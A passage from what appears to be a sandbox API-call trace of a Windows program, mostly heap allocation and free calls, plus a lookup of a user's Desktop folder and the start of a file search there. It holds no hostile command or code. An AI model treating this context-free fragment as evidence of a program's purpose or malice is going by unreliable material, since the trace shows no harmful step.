dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75c18 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0107.078] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0107.078] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0107.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0107.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0107.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0107.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0107.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0107.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0107.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0107.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0107.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0107.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0107.081] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0107.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0107.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0107.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0107.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0107.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0107.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0107.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0107.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0107.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.084] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.084] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0107.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.085] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/yi TyUTEx1dVRHalW", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, 